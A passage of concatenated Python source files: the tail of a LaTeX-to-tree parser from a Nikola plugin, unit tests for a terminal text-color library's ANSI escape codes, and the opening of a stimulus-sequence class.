if self.tokens.current() == (tokenizer.Token.Command, "end") and self.tokens.peek_type(1) == tokenizer.Token.CurlyBraketOpen and self.tokens.peek(2) == (tokenizer.Token.Text, command[1]) and self.tokens.peek_type(3) == tokenizer.Token.CurlyBraketClose:
stop = self.tokens.current_indices()[0]
self.tokens.skip_current(4)
break
self.tokens.skip_current()
content = self.tokens.get_substring(start, stop).strip()
args = None
if command[2][0] is not None:
args = command[2][0].recombine_as_text().strip()
return tree.TikzPicture(content, args)
def __get_PSTricks_picture(self, command):
start = self.tokens.current_indices()[0]
while self.tokens.has_current():
if self.tokens.current() == (tokenizer.Token.Command, "end") and self.tokens.peek_type(1) == tokenizer.Token.CurlyBraketOpen and self.tokens.peek(2) == (tokenizer.Token.Text, command[1]) and self.tokens.peek_type(3) == tokenizer.Token.CurlyBraketClose:
stop = self.tokens.current_indices()[0]
self.tokens.skip_current(4)
break
self.tokens.skip_current()
content = self.tokens.get_substring(start, stop).strip()
        argsList = re.split(r"\s*,\s*", command[2][0].recombine_as_text().strip())
args = dict()
for entry in argsList:
entry = entry.split("=")
assert len(entry) == 2
args[entry[0].strip()] = entry[1].strip()
return tree.PSTricksPicture(content, args)
def __parse_command_impl(self, cmd, env, is_environment, eat_trailing_whitespace, argument_count, default_arguments, accept_unknown_commands=False, math_mode=False, url_mode=set()):
args = []
# Adjust argument count
argument_count -= len(default_arguments)
# Scan default arguments
found_default_arguments = []
while len(found_default_arguments) < len(default_arguments):
idx = 0
while self.tokens.peek_type(idx) == tokenizer.Token.Whitespace:
idx += 1
if self.tokens.peek_type(idx) == tokenizer.Token.SquareBraketOpen:
while idx > 0:
self.tokens.skip_current()
idx -= 1
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
self.__expect(tokenizer.Token.SquareBraketOpen)
found_default_arguments.append(self.__parse_words(math_mode=math_mode, delimiter=tokenizer.Token.SquareBraketClose, accept_unknown_commands=accept_unknown_commands, url_mode=idx in url_mode))
self.__expect(tokenizer.Token.SquareBraketClose)
else:
break
while len(found_default_arguments) < len(default_arguments):
found_default_arguments.append(default_arguments[len(found_default_arguments)])
# Scan other arguments
while len(args) < argument_count:
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
self.__expect(tokenizer.Token.CurlyBraketOpen)
args.append(self.__parse_words(math_mode=math_mode, delimiter=tokenizer.Token.CurlyBraketClose, accept_unknown_commands=accept_unknown_commands, url_mode=len(args) in url_mode))
self.__expect(tokenizer.Token.CurlyBraketClose)
if eat_trailing_whitespace:
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
else:
while self.tokens.current_type() == tokenizer.Token.Comment:
self.tokens.skip_current()
# Add default arguments at end of usual arguments
args.extend(found_default_arguments)
if is_environment:
return cmd, env, args
else:
return cmd, args
def __parse_command(self, accept_unknown_commands, math_mode=False):
self.__expect(tokenizer.Token.Command, False)
cmd = self.tokens.current_value()
is_environment = False
if cmd == "begin" or cmd == "end":
is_environment = True
self.tokens.skip_current()
# Determine number of arguments
if is_environment:
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
self.__expect(tokenizer.Token.CurlyBraketOpen)
env = self.tokens.current_value()
self.__expect(tokenizer.Token.Text)
self.__expect(tokenizer.Token.CurlyBraketClose)
if env not in self.parsing_environment.environments:
if accept_unknown_commands:
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
return (cmd, env),
raise ParseError(self.tokens, "Unknown environment '{}'!".format(env), filename=self.filename)
envI = self.parsing_environment.environments[env]
eat_trailing_whitespace = envI.eat_trailing_whitespace
if cmd == "end":
argument_count = 0
default_arguments = []
accept_unknown_commands = False
url_mode = set()
else:
argument_count = envI.argument_count
default_arguments = envI.default_arguments
accept_unknown_commands = envI.accept_unknown_commands
url_mode = envI.url_mode
else:
if cmd not in self.parsing_environment.commands:
if accept_unknown_commands:
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
return cmd,
raise ParseError(self.tokens, "Unknown command '{}'!".format(cmd), filename=self.filename)
cmdI = self.parsing_environment.commands[cmd]
eat_trailing_whitespace = cmdI.eat_trailing_whitespace
argument_count = cmdI.argument_count
default_arguments = cmdI.default_arguments
accept_unknown_commands = cmdI.accept_unknown_commands
url_mode = cmdI.url_mode
env = None
return self.__parse_command_impl(cmd, env, is_environment, eat_trailing_whitespace, argument_count, default_arguments, accept_unknown_commands=accept_unknown_commands, math_mode=math_mode, url_mode=url_mode)
def __postprocess_text(self, text):
for f, t in [
("<<", "\u00AB"),
(">>", "\u00BB"),
("---", "\u2014"),
("--", "\u2013"),
("``", "\u201C"),
("''", "\u201D"),
]:
text = text.replace(f, t)
return text
def __add_language(self, element, language, inline=True):
langdata = self.parsing_environment.languages.get(language)
if langdata is None:
raise Exception("Unknown language '{0}'!".format(language))
return tree.Language(element, langdata.get('right_to_left', False), langdata['locale'], inline=inline)
def __parse_symbol(self, code):
try:
code = int(code)
except Exception:
raise ParseError(self.tokens, "Cannot interpret symbol '{0}'!".format(code), filename=self.filename)
return tree.WordPart(chr(code))
def __parse_words(self, math_mode, delimiter, accept_unknown_commands=False, table_mode=False, url_mode=False):
current_words = tree.Words()
current_word = None
table_ended = False
def add_to_current_word(part):
nonlocal current_word
if current_word is None:
current_word = tree.Word()
current_word.parts.append(part)
while self.tokens.has_current():
token = self.tokens.current_type()
if token == tokenizer.Token.Whitespace:
# Flush word
if current_word is not None:
current_words.words.append(current_word)
current_word = None
else:
current_words.words.append(tree.Word())
self.tokens.skip_current()
elif token == tokenizer.Token.NonbreakableWhitespace:
add_to_current_word(tree.WordPart(" "))
self.tokens.skip_current()
elif token == tokenizer.Token.Comment:
add_to_current_word(tree.Comment(self.tokens.current_value()))
self.tokens.skip_current()
elif token == tokenizer.Token.Text:
add_to_current_word(tree.WordPart(self.__postprocess_text(self.tokens.current_value())))
self.tokens.skip_current()
elif token == tokenizer.Token.EscapedText:
add_to_current_word(tree.WordPart(self.tokens.current_value(), escaped=True))
self.tokens.skip_current()
elif token == tokenizer.Token.Command:
level = _Level.get_level(self.tokens.current_value())
if level != _Level.NO_LEVEL:
raise ParseError(self.tokens, "Cannot process level-changing command during words parsing!", filename=self.filename)
else:
# math_mode: "ignore" unknown commands and put as text into stream
command = self.__parse_command(math_mode or accept_unknown_commands, math_mode=math_mode)
form = self.__get_formatting(command)
if form is not None:
add_to_current_word(form)
if len(command) == 1:
if command[0] == "(":
formula = self.__read_formula((")",))
add_to_current_word(tree.Formula(formula))
elif command[0] == "[":
raise ParseError(self.tokens, "Display mode math not allowed during word parsing!", filename=self.filename)
elif command[0] == ")" or command[0] == "]":
raise ParseError(self.tokens, "Unexpected end of math mode!", filename=self.filename)
else:
text = "\\{0}".format(command[0])
if len(command) == 2:
text += "{{{0}}}".format(command[1].strip())
add_to_current_word(tree.WordPart(text + " "))
elif command[0] == "code":
add_to_current_word(self.__get_inline_code(command[1][0]))
elif command[0] == 'href':
add_to_current_word(tree.Link(command[1][0].recombine_as_text(reescape=False), link_text=command[1][1]))
elif command[0] == 'url':
add_to_current_word(tree.Link(command[1][0].recombine_as_text(reescape=False)))
elif command[0] == 'symbol':
add_to_current_word(self.__parse_symbol(command[1][0].recombine_as_text()))
elif command[0] == 'ref':
add_to_current_word(tree.Reference(command[1][0].recombine_as_text(), command[1][1]))
elif command[0] == 'includegraphics':
if math_mode:
raise ParseError(self.tokens, "\\includegraphics not allowed in math mode!", filename=self.filename)
add_to_current_word(self.__get_includegraphics(command))
elif command[0] == 'begin' and command[1] == 'tikzpicture':
add_to_current_word(self.__get_tikz_picture(command))
elif command[0] == 'begin' and command[1] == 'pstricks':
add_to_current_word(self.__get_PSTricks_picture(command))
elif command[0] == 'foreignlanguage':
add_to_current_word(self.__add_language(command[1][1], command[1][0].recombine_as_text()))
elif command[0] in _replacement_commands:
add_to_current_word(tree.WordPart(_replacement_commands[command[0]]))
else:
if len(command) == 2:
raise ParseError(self.tokens, "Command '{}' not allowed during words parsing!".format(command[0]), filename=self.filename)
elif command[0] == 'end':
if command[1] == 'tabular' and table_mode:
table_ended = True
break
raise ParseError(self.tokens, "Unexpected end of environment '{}'!".format(command[1]), filename=self.filename)
else:
raise ParseError(self.tokens, "Environment '{}' not allowed during words parsing!".format(command[1]), filename=self.filename)
elif token == tokenizer.Token.InlineFormulaDelimiter:
if math_mode:
raise ParseError(self.tokens, "Cannot start another formula inside an formula!", filename=self.filename)
self.tokens.skip_current()
formula = self.__read_formula(tokenizer.Token.InlineFormulaDelimiter)
add_to_current_word(tree.Formula(formula))
elif token == tokenizer.Token.DisplayFormulaDelimiter:
raise ParseError(self.tokens, "Cannot process display-style formulae during words parsing!", filename=self.filename)
elif token == tokenizer.Token.CurlyBraketOpen:
self.tokens.skip_current()
add_to_current_word(self.__parse_words(math_mode=math_mode, delimiter=tokenizer.Token.CurlyBraketClose, accept_unknown_commands=accept_unknown_commands, url_mode=url_mode))
self.__expect(tokenizer.Token.CurlyBraketClose)
elif token == delimiter:
break
elif token == tokenizer.Token.CurlyBraketClose:
raise ParseError(self.tokens, "Unexpected closing curly braket during words parsing!", filename=self.filename)
elif token == tokenizer.Token.SquareBraketOpen:
add_to_current_word(tree.WordPart("["))
self.tokens.skip_current()
elif token == tokenizer.Token.SquareBraketClose:
add_to_current_word(tree.WordPart("]"))
self.tokens.skip_current()
elif token == tokenizer.Token.DoubleNewLine:
raise ParseError(self.tokens, "Cannot process paragraph break during words parsing!", filename=self.filename)
elif table_mode and token in (tokenizer.Token.ForcedLineBreak, tokenizer.Token.TableColumnDelimiter):
break
elif math_mode and token in (tokenizer.Token.ForcedLineBreak, tokenizer.Token.TableColumnDelimiter):
self.tokens.skip_current() # ignore
elif url_mode and token == tokenizer.Token.TableColumnDelimiter:
add_to_current_word(tree.WordPart("&", escaped=True))
self.tokens.skip_current()
else:
raise ParseError(self.tokens, "Cannot handle token {}!".format(token), filename=self.filename)
# Flush word
if current_word is not None:
current_words.words.append(current_word)
current_word = None
else:
if len(current_words.words) > 0 and len(current_words.words[-1].parts) > 0:
current_words.words.append(tree.Word())
if table_mode:
return current_words, table_ended
else:
return current_words
def __read_formula(self, delimiter):
start = self.tokens.current_indices()[0]
delimitedByEnvironmentEnd = (type(delimiter) == tuple)
while self.tokens.has_current():
stop = self.tokens.current_indices()[0]
token = self.tokens.current_type()
if not delimitedByEnvironmentEnd and token == delimiter:
self.__expect(delimiter)
break
if token == tokenizer.Token.Command and delimitedByEnvironmentEnd:
if len(delimiter) > 1 and self.tokens.current_value() == "end":
command = self.__parse_command(True, math_mode=True)
if len(command) != 1:
if command[1] == delimiter[1]:
break
elif len(delimiter) == 1 and self.tokens.current_value() == delimiter[0]:
self.tokens.skip_current()
break
else:
self.tokens.skip_current()
elif token == tokenizer.Token.CurlyBraketOpen:
self.tokens.skip_current()
self.__parse_words(math_mode=True, delimiter=tokenizer.Token.CurlyBraketClose)
self.__expect(tokenizer.Token.CurlyBraketClose)
elif token == tokenizer.Token.CurlyBraketClose:
raise ParseError(self.tokens, "Unexpected closing curly braket during formula!", filename=self.filename)
else:
self.tokens.skip_current()
return self.tokens.get_substring(start, stop).strip()
def __expect_empty__parse_block_result(self, res):
if res is not None:
if len(res) == 3:
raise ParseError(self.tokens, "Unexpected \\end{{{0}}} in block!".format(res[1]), filename=self.filename)
else:
raise ParseError(self.tokens, "Unexpected \\{0} in block!".format(res[0]), filename=self.filename)
def __get_picturegroup(self, command):
result = tree.PictureGroup()
while self.tokens.has_current():
token = self.tokens.current_type()
if token == tokenizer.Token.Command:
value = self.tokens.current_value()
if value == 'end':
command = self.__parse_command(False)
if command[1] != 'picturegroup':
raise ParseError(self.tokens, "Unexpected \\end{{{0}}} in picture group!".format(command[1]), filename=self.filename)
return result
elif value == 'picture':
self.tokens.skip_current()
command = self.__parse_command_impl('picture', None, False, True, 2, [])
result.pictures.append((command[1][0], command[1][1]))
else:
raise ParseError(self.tokens, "Unexpected \\{0} in picture group!".format(value), filename=self.filename)
else:
raise ParseError(self.tokens, "Unexpected token {0} in picture group!".format(token), filename=self.filename)
def __get_formulalist(self, command):
result = tree.FormulaList()
while self.tokens.has_current():
token = self.tokens.current_type()
if token == tokenizer.Token.Command:
value = self.tokens.current_value()
if value == 'end':
command = self.__parse_command(False)
if command[1] != 'formulalist':
raise ParseError(self.tokens, "Unexpected \\end{{{0}}} in formula list!".format(command[1]), filename=self.filename)
return result
elif value == 'formula':
self.tokens.skip_current()
command = self.__parse_command_impl('formula', None, False, True, 1, [])
result.formulae.append(command[1][0])
else:
raise ParseError(self.tokens, "Unexpected \\{0} in formula list!".format(value), filename=self.filename)
else:
raise ParseError(self.tokens, "Unexpected token {0} in formula list!".format(token), filename=self.filename)
def __parse_tabular_alignment(self, alignment):
result = []
left_border = False
for c in alignment.recombine_as_text():
if c == '|':
if len(result) > 0:
result[-1].right_border = True
else:
left_border = True
elif c == 'l':
result.append(tree.TabularAlign(tree.TabularAlignEnum.Left, left_border=left_border))
left_border = False
elif c == 'c':
result.append(tree.TabularAlign(tree.TabularAlignEnum.Center, left_border=left_border))
left_border = False
elif c == 'r':
result.append(tree.TabularAlign(tree.TabularAlignEnum.Right, left_border=left_border))
left_border = False
elif c == ' ':
pass # ignore
else:
raise ParseError(self.tokens, "Unknown tabular alignment character '{0}'!".format(c), filename=self.filename)
return result
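    # Hedged example of the mapping performed above (the column spec is made up):
    # an alignment string like "|l|c r|" yields three TabularAlign entries:
    # Left (left and right border), Center (no borders), Right (right border);
    # spaces in the spec are ignored.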
def __parse_tabular_lines(self):
result = []
while self.tokens.has_current():
token = self.tokens.current_type()
if token == tokenizer.Token.Command:
value = self.tokens.current_value()
if value == 'hline':
self.tokens.skip_current()
result.append(None)
elif value == 'cline':
command = self.__parse_command(False)
value = command[1][0].recombine_as_text()
value_split = value.split('-')
if len(value_split) != 2:
raise ParseError(self.tokens, "Cannot interpret '{}' as column range!".format(value), filename=self.filename)
start = int(value_split[0]) if value_split[0] else None
end = int(value_split[1]) if value_split[1] else None
if start is None and end is None:
result.append(None)
else:
result.append((start, end))
else:
break
elif token == tokenizer.Token.Whitespace:
self.tokens.skip_current() # ignore
elif token == tokenizer.Token.Comment:
self.tokens.skip_current() # ignore
else:
break
return result
def __parse_block(self, destination_block, block_level, current_Level, insideEnv):
# Read blocks into higher-level block
current_block = None
current_words = None
current_word = None
def flush_word():
nonlocal current_word, current_words
# Flush word
if current_word is not None:
if current_words is None:
current_words = tree.Words()
current_words.words.append(current_word)
current_word = None
def flush_words():
nonlocal current_words, current_block
flush_word()
# Flush words
if current_words is not None:
if current_block is None:
current_block = tree.Block()
current_block.elements.append(current_words)
current_words = None
def flush_block():
nonlocal current_block
flush_words()
# Flush block
if current_block is not None:
destination_block.elements.append(current_block)
current_block = None
def add_to_current_word(part):
nonlocal current_word
if current_word is None:
current_word = tree.Word()
current_word.parts.append(part)
def add_to_current_block(part):
nonlocal current_words, current_block
flush_words()
if current_block is None:
current_block = tree.Block()
current_block.elements.append(part)
while self.tokens.has_current():
token = self.tokens.current_type()
# print("Current block: " + str(current_block))
# print("Current words: " + str(current_words))
# print("Current word: " + str(current_word))
# print(str(token))
if token == tokenizer.Token.Whitespace:
flush_word()
self.tokens.skip_current()
elif token == tokenizer.Token.NonbreakableWhitespace:
add_to_current_word(tree.WordPart(" "))
self.tokens.skip_current()
elif token == tokenizer.Token.Comment:
add_to_current_word(tree.Comment(self.tokens.current_value()))
self.tokens.skip_current()
elif token == tokenizer.Token.Text:
add_to_current_word(tree.WordPart(self.__postprocess_text(self.tokens.current_value())))
self.tokens.skip_current()
elif token == tokenizer.Token.EscapedText:
add_to_current_word(tree.WordPart(self.tokens.current_value(), escaped=True))
self.tokens.skip_current()
elif token == tokenizer.Token.Command:
level = _Level.get_level(self.tokens.current_value())
if level != _Level.NO_LEVEL:
if insideEnv:
raise ParseError(self.tokens, "Cannot start new block level inside an environment!", filename=self.filename)
# If we want to start a level which is as high as the block level or higher, we need to quit this function first
if level <= block_level:
break
# Now compare the level to the current level
if level > current_Level:
flush_words()
# add as child
command = self.__parse_command(False)
new_block = _Level.create_object(level, command[1][0])
res = self.__parse_block(new_block, level, level, False)
self.__expect_empty__parse_block_result(res)
if current_block is None:
current_block = tree.Block()
current_block.elements.append(new_block)
else:
flush_block()
# Add on same level
command = self.__parse_command(False)
new_block = _Level.create_object(level, command[1][0])
res = self.__parse_block(new_block, level, level, False)
self.__expect_empty__parse_block_result(res)
destination_block.elements.append(new_block)
current_Level = level
else:
if self.tokens.current_value() == "(":
self.tokens.skip_current()
formula = self.__read_formula((")",))
add_to_current_word(tree.Formula(formula))
elif self.tokens.current_value() == "[":
self.tokens.skip_current()
self.tokens.skip_current()
formula = self.__read_formula(("]",))
add_to_current_block(tree.DisplayFormula(formula))
elif self.tokens.current_value() == ")" or self.tokens.current_value() == "]":
raise ParseError(self.tokens, "Unexpected end of math mode!", filename=self.filename)
else:
command = self.__parse_command(False)
form = self.__get_formatting(command)
if form is not None:
add_to_current_word(form)
elif len(command) == 3:
# environment
if command[0] == "end":
flush_block()
return command
if command[1] in {"definition", "definitions", "lemma", "proposition", "theorem", "corollary", "example", "examples", "remark", "remarks", "proof"}:
# Add on same level
new_block = tree.TheoremEnvironment(command[1])
if command[2][0] is not None:
new_block.optional_title = command[2][0]
res = self.__parse_block(new_block, current_Level, current_Level, False)
if res is None:
raise ParseError(self.tokens, "Unexpected end of '{}' environment!".format(command[1]), filename=self.filename)
if len(res) != 3:
self.__expect_empty__parse_block_result(res)
if res[1] != command[1]:
raise ParseError(self.tokens, "{0} paired with {1}!".format(self.__command_name(command), self.__command_name(res)), filename=self.filename)
add_to_current_block(new_block)
elif command[1] in ['blockquote', 'center']:
# Add on same level
new_block = tree.SpecialBlock(command[1])
res = self.__parse_block(new_block, current_Level, current_Level, False)
if res is None:
raise ParseError(self.tokens, "Unexpected end of '{}' environment!".format(command[1]), filename=self.filename)
if len(res) != 3:
self.__expect_empty__parse_block_result(res)
if res[1] != command[1]:
raise ParseError(self.tokens, "{0} paired with {1}!".format(self.__command_name(command), self.__command_name(res)), filename=self.filename)
add_to_current_block(new_block)
elif command[1] in {"align*", "align"}:
formula = self.__read_formula(command)
# Add display formula
add_to_current_block(tree.AlignFormula(formula))
elif command[1] in {"itemize", "enumerate"}:
if command[1] == "itemize":
enumType = "ul"
else:
enumType = "ol"
enum = tree.Enumeration(enumType)
# Parse first "item"
item_command = self.__parse_command(False)
if len(item_command) != 2 or item_command[0] != 'item':
raise ParseError(self.tokens, "Expected \\item, but got {}".format(self.__command_name(item_command)), filename=self.filename)
while True:
new_block = tree.Block()
res = self.__parse_block(new_block, _Level.Text, _Level.Text, False)
if len(new_block.elements) == 1:
enum.elements.append(new_block.elements[0])
else:
enum.elements.append(new_block)
# Check for result
if res is None:
raise ParseError(self.tokens, "Unexpected end of '{}' environment!".format(command[1]), filename=self.filename)
if len(res) == 2 and res[0] == "item":
continue
if len(res) == 3 and res[1] == command[1] and res[0] == 'end':
break
if len(res) == 3 and res[1] != command[1]:
raise ParseError(self.tokens, "{0} paired with {1}!".format(self.__command_name(command), self.__command_name(res)), filename=self.filename)
self.__expect_empty__parse_block_result(res)
add_to_current_block(enum)
elif command[1] == "codelisting":
flush_block()
# Extract code
start = self.tokens.current_indices()[0]
while self.tokens.has_current():
if self.tokens.current() == (tokenizer.Token.Command, "end") and self.tokens.peek_type(1) == tokenizer.Token.CurlyBraketOpen and self.tokens.peek(2) == (tokenizer.Token.Text, "codelisting") and self.tokens.peek_type(3) == tokenizer.Token.CurlyBraketClose:
stop = self.tokens.current_indices()[0]
self.tokens.skip_current(4)
break
self.tokens.skip_current()
destination_block.elements.append(tree.CodeBlock(command[2][0].recombine_as_text(), self.tokens.get_substring(start, stop).strip(" ").strip("\n")))
elif command[1] == 'tikzpicture':
add_to_current_word(self.__get_tikz_picture(command))
elif command[1] == 'pstricks':
add_to_current_word(self.__get_PSTricks_picture(command))
elif command[1] == 'picturegroup':
add_to_current_block(self.__get_picturegroup(command))
elif command[1] == 'formulalist':
add_to_current_block(self.__get_formulalist(command))
elif command[1] == 'tabular':
tabular = tree.Tabular(self.__parse_tabular_alignment(command[2][0]))
tabular.add_lines(self.__parse_tabular_lines())
while True:
cell, table_ended = self.__parse_words(math_mode=False, delimiter=None, table_mode=True)
tabular.add_cell(cell)
if table_ended:
break
token = self.tokens.current_type()
if token == tokenizer.Token.ForcedLineBreak:
tabular.next_row()
self.tokens.skip_current()
tabular.add_lines(self.__parse_tabular_lines())
elif token == tokenizer.Token.TableColumnDelimiter:
self.tokens.skip_current()
else:
raise ParseError(self.tokens, "Unexpected {0} token in tabular environment!".format(token), filename=self.filename)
tabular.end_of_table_parsing()
add_to_current_word(tabular)
else:
raise ParseError(self.tokens, "Unknown environment start {}!".format(self.__command_name(command)), filename=self.filename)
else:
# command
if command[0] == 'newpar':
flush_words()
elif command[0] == 'item':
flush_block()
return command
elif command[0] == 'noindent':
pass # ignore
elif command[0] == 'setlength':
pass # ignore
elif command[0] == "code":
add_to_current_word(self.__get_inline_code(command[1][0]))
elif command[0] == 'href':
add_to_current_word(tree.Link(command[1][0].recombine_as_text(reescape=False), link_text=command[1][1]))
elif command[0] == 'url':
add_to_current_word(tree.Link(command[1][0].recombine_as_text(reescape=False)))
elif command[0] == 'symbol':
add_to_current_word(self.__parse_symbol(command[1][0].recombine_as_text()))
elif command[0] == 'ref':
add_to_current_word(tree.Reference(command[1][0].recombine_as_text(), command[1][1]))
elif command[0] == 'qed':
if isinstance(destination_block, tree.TheoremEnvironment):
destination_block.qed = True
elif command[0] == 'label':
destination_block.labels.append(command[1][0].recombine_as_text())
elif command[0] == 'includegraphics':
add_to_current_word(self.__get_includegraphics(command))
elif command[0] == 'foreignlanguage':
add_to_current_word(self.__add_language(command[1][1], command[1][0].recombine_as_text()))
elif command[0] in _replacement_commands:
add_to_current_word(tree.WordPart(_replacement_commands[command[0]]))
else:
raise ParseError(self.tokens, "Unsupported command '{}'!".format(command[0]), filename=self.filename)
elif token == tokenizer.Token.InlineFormulaDelimiter:
self.tokens.skip_current()
formula = self.__read_formula(tokenizer.Token.InlineFormulaDelimiter)
add_to_current_word(tree.Formula(formula))
elif token == tokenizer.Token.DisplayFormulaDelimiter:
self.tokens.skip_current()
formula = self.__read_formula(tokenizer.Token.DisplayFormulaDelimiter)
add_to_current_block(tree.DisplayFormula(formula))
elif token == tokenizer.Token.CurlyBraketOpen:
self.tokens.skip_current()
add_to_current_word(self.__parse_words(math_mode=False, delimiter=tokenizer.Token.CurlyBraketClose))
self.__expect(tokenizer.Token.CurlyBraketClose)
elif token == tokenizer.Token.CurlyBraketClose:
                raise ParseError(self.tokens, "Unexpected closing curly bracket!", filename=self.filename)
elif token == tokenizer.Token.SquareBraketOpen:
add_to_current_word(tree.WordPart("["))
self.tokens.skip_current()
elif token == tokenizer.Token.SquareBraketClose:
add_to_current_word(tree.WordPart("]"))
self.tokens.skip_current()
elif token == tokenizer.Token.DoubleNewLine:
flush_words()
self.tokens.skip_current()
else:
raise ParseError(self.tokens, "Cannot handle token {}!".format(token), filename=self.filename)
flush_block()
return None
def parse(self):
"""Do parsing."""
block = tree.Block()
res = self.__parse_block(block, _Level.Everything, _Level.Text, False)
self.__expect_empty__parse_block_result(res)
block = self.__flatten(block)
return block
def parse(input, parsing_environment, filename=None):
"""Create parser object and execute parsing.
``input``: unicode input string;
``parsing_environment``: instance of ``ParsingEnvironment``;
``filename``: optional filename to be used in error messages.
"""
parser = Parser(input, parsing_environment, filename=filename)
return parser.parse()
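# Hedged usage note (editor addition, not part of the original plugin): a typical
# call looks like
#     block = parse(latex_source, parsing_environment, filename="post.tex")
# where `parsing_environment` is an instance of this plugin's ParsingEnvironment
# class (defined elsewhere) and the returned tree.Block is what the plugin renders.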
| getnikola/plugins | v7/latex/latex/parser.py | Python | mit | 59,047 |
# -*- coding: utf-8 -*-
import unittest
try:
from terminal_text_color import *
except ImportError:
import os,sys
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
from terminal_text_color import TextColor
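# The expected ANSI SGR escape sequence used throughout these tests has the form
#   "\x1b[<style>;<fg>;<bg>m" + text + "\x1b[0m"
# where <style> is 0=default, 1=bold, 2=faint, 3=italic, 4=underline, 9=crossed-out,
# <fg> is 30-37 (39 = default foreground) and <bg> is 40-47 (49 = default background).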
class TexColorTestStyle(unittest.TestCase):
def testStyleDefault(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[0;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.default(texto), textoesperado)
def testStyleBold(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[1;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.bold(texto), textoesperado)
def testStyleOpaque(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[2;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.opaque(texto), textoesperado)
def testStyleItalic(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[3;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.italic(texto), textoesperado)
def testStyleUnderline(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[4;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.underline(texto), textoesperado)
def testStyleCrossedout(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[9;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.crossedout(texto), textoesperado)
class TextColorTestColor(unittest.TestCase):
"""docstring for TextColorTestColor"""
def testColorGrey (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;30;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_grey(texto), textoesperado)
def testColorRed (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;31;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_red(texto), textoesperado)
def testColorGreen (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;32;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_green(texto), textoesperado)
def testColorYellow (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;33;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_yellow(texto), textoesperado)
def testColorBlue (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;34;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_blue(texto), textoesperado)
def testColorMagenta (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;35;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_magenta(texto), textoesperado)
def testColorCyan (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;36;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_cyan(texto), textoesperado)
def testColorWhite (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;37;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_white(texto), textoesperado)
class TextColorTestBackground(unittest.TestCase):
"""docstring for TextColorTestColor"""
def testBackgroundGrey (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;40m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_grey(texto), textoesperado)
def testBackgroundRed (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;41m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_red(texto), textoesperado)
def testBackgroundGreen (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;42m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_green(texto), textoesperado)
def testBackgroundYellow (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;43m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_yellow(texto), textoesperado)
def testBackgroundBlue (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;44m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_blue(texto), textoesperado)
def testBackgroundMagenta (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;45m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_magenta(texto), textoesperado)
def testBackgroundCyan (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;46m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_cyan(texto), textoesperado)
def testBackgroundWhite (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;47m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_white(texto), textoesperado)
if __name__ == '__main__':
unittest.main() | ElMijo/terminal-text-color-py | tests/text_color_test.py | Python | mit | 5,022 |
# TODO :
# [X] - load sequence from file
# [] - use of the event sequence
# [] - noise codes stimulus
# ensure the divisions produce float if needed
from random import shuffle, randint, random
from math import ceil, cos, sin, pi
class StimSeq :
stimSeq = None # [ nEvent x nSymb ] stimulus code for each time point for each stimulus
stimTime_ms = None # time stim i ends, i.e. stimulus i is on screen from stimTime_ms[i-1]-stimTime_ms[i]
eventSeq = None # events to send at each stimulus point
def __init__(self,st=None,ss=None,es=None):
self.stimSeq = ss
self.stimTime_ms = st
self.eventSeq = es
def __str__(self):
res = "#stimTimes: ";
if not self.stimTime_ms is None:
res += "(1," + str(len(self.stimTime_ms)) + ")\n"
for i in range(0,len(self.stimTime_ms)-1):
res += str(self.stimTime_ms[i]) + " "
res+= str(self.stimTime_ms[-1]) + "\n"
else:
res+= "<null>\n"
res+= "\n\n"
res += "#stimSeq : "
